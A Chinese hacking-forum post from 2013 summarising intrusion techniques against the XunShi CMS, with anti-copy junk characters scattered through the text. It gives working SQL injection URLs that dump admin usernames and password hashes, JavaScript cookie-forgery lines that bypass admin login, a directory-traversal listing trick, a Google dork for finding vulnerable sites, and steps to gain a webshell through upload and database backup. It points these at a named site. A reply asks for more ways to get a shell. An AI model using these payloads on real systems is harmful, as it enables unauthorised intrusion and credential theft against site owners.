找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2524|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
: ]5 ]5 h1 ]5 W5 Z% c" S. |
! U  S9 U% i- z% j在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新). q) y' i. ?! `# V$ q4 ^" B

8 ]& V5 A! y* `& J以下本文总结来自黑防去年第9期杂志上的内容...; m( L  e2 ^- f- O% L
( [! w% @" i* u1 x& Z9 l
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%% l1 J8 n" P1 M4 I# X# f2 G0 I

+ P5 N5 g' Q: W26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2 B; F+ ^) \0 |" Y3 g, A1 D, K% I# d4 \2 F# P
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况1 U! t' w, p0 K) @+ S/ Q
这里一个注入
+ @: e2 w  m0 B1 L8 n' r2 k/ ?) G+ T  H: k. B( P0 u+ r
效果如图:
5 M7 Z8 i& o; r: Z6 k, f
. y1 Q- G8 v0 |3 ^! T  |" x
' D: O& v: b7 \' q
4 L0 Y. U+ C% [. l2 r1 {# C$ m这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.7 f6 x  K1 L) B

1 s1 d9 `5 V' i/ h/ g' N- F密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去1 D1 a) Z, C" H2 L. Q) y

, L7 h& J6 Z( `javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
3 P" z8 A) y+ S, c
* i& w( x: Z' n1 }% _* v那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:( j1 G* A/ {7 A- @

, W3 N1 K/ k) {$ T因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
0 N$ u# m) G- P2 u( J$ ?8 t9 K* b- `. _5 r/ I
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以- t2 b5 l0 v) R
- P: `6 b. V8 l: ]
访问这页面来列目录..步骤如下:6 J- J& i4 ~) Z
8 o1 J" P: C( D$ L+ Q
javascript:alert(document.cookie="admindj=1") 8 W0 l3 ~: a) ?5 g6 A3 `% m

& d' P% Q- a; G- Mhttp://www.political-security.co ... asp?id=46&dir=../..& K& }: p: o1 X( y' T6 l

" ?0 M' j" \  @* A& A) I' |效果如图:
  d% ]; _( s" h, d/ }( u8 |( |0 z4 A$ c, ?: U
) w* P5 ?3 v! f7 ]  p' f/ D7 U

7 M: @# C4 c, {! J2 N; I: P$ I这样全站目录都能瞧了..找到后台目录..进去..! R5 i9 \. C) o. f: K$ N7 Y$ L$ n
! j% s& w: M4 \, o" e
那么进了后台怎么拿shell??上传--备份就ok了..
8 Z! h. u+ t$ f2 |+ R7 E
' @! I. t/ Y/ [9 L: C9 H' `那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
/ t7 ^6 I! X. ]. d1 D5 k3 Y$ q+ a; ?; `0 P) J& |
这个我也碰到过一次..你都可以通过列目录来实现..* A3 Y8 G6 _1 |- b7 O

9 q( P/ }  R3 v( mjavascript:alert(document.cookie="admindj=1") * C. k8 j. v0 E8 t( T  I  I0 x3 u

2 D' ?+ M* Q2 p; j2 j4 Rhttp://www.political-security.co ... p?action=BackupData , i% k+ M1 o5 k& s5 a. [) h
7 P5 k7 w2 |8 H7 }7 r- w8 a
备份ok..
7 o/ Z* T7 V1 B6 f
, A% X; ^( t* e7 Z那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
! ]/ P& U, P( A% i0 h
% \1 y5 R" ^" }+ k6 e* ?% ^在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
4 r3 G+ a3 b- u$ g9 D. i$ B- X2 E/ W: F7 J0 `$ E
然后访问此页面进行注入..步骤如下:
  c" i7 _; i$ N# |) H
; B2 N7 Z4 K6 w( M3 ~javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
/ n" [7 q, `- M( A' z  W* E' C- P* {% k" [, X0 {. b# Q
然后请求admin/admin_chk.asp页面
  D$ g% O, V& E+ V  L( ?/ j
4 C% Q' D; d. V3 e8 p, P4 p输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%7 B3 p% P9 f0 H) b

( |: l  l1 Z" a" W26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin" J3 ]- j% G) {# C+ J% L5 [' R

" B  R. \! [0 O* z0 l效果如图所示:, X1 L0 d. @2 I' H+ \7 C/ P- }" ~) g% b
) A% i" D& H2 P$ }! c0 d

# m, R4 q$ {# j  P4 j8 P" a( P$ K# ^) U# v. A* T4 Z3 v
讯时漏洞2
6 l! l. L$ @" O& L7 d* Y6 a, @* s4 Qgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
6 m5 f4 {9 P" \1 d' ] . Z' t! G2 V. n2 s1 _" d, Q; L
1、/admin/admin_news_pl_view.asp?id=1
3 C+ D3 ~# D7 Z+ ~//id任意 填入以下语句
  b# g5 L' H. `) O: ?( X
4 g6 L5 ?7 l0 t( X4 D$ p2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
( {* h. H! l; o - y" ]* j) |' y. Z
) k- _- d6 L- W) J* s4 F6 L

- z6 Q" a4 p3 w$ {. W; E3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='# A8 C+ I' e* O/ h8 d! S1 R
# @# |1 E" |' D* c' {' o

! k$ Q& l: W; O1 Y' ?6 K7 q3 k0 h. A& l# u5 D# b
爆出管理员帐号和密码了4 L- B. b; W( G3 F) v* c  l

  Y6 ^2 B. {; F- R& S9 q% N+ h" `9 U& z9 i9 v& b! b

+ r; v3 ^+ e0 a9 W4、cookies进后台( g, O6 Q  y0 ]7 P( u- s; y; E

/ B' }3 i2 e/ S# l" V! Sjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));8 ]5 G% O) x! b+ l0 ^* n4 F
- z  s  V% z) h6 S5 d) a
) b" I: X8 l5 r0 g1 @7 k# {$ o

6 e! y- `$ t1 ~, f* V5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
" K5 v, z$ {1 S9 ^% a# n% k
* x3 I. M  H$ a! a' u6 O. q2 s
" Y  {% h/ E0 Y6 I7 D) ^/ Z* W/ S5 c& i( f5 i
6、后台有上传和备份取SHELL不难。
2 `' r- e. k# j$ J1 O0 U
  q" H0 m& y- t& v6 [8 i7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
" U+ u  h* @' |
+ y& ]2 A  u6 N3 h- a+ K逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!2 S+ f* |/ R" k/ F

- F( }, B9 `7 Z' Q% z# _$ b2 e( ?, ?7 {  C! u

7 J, D3 P" ^, f+ s6 U8 C! V5 `5 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表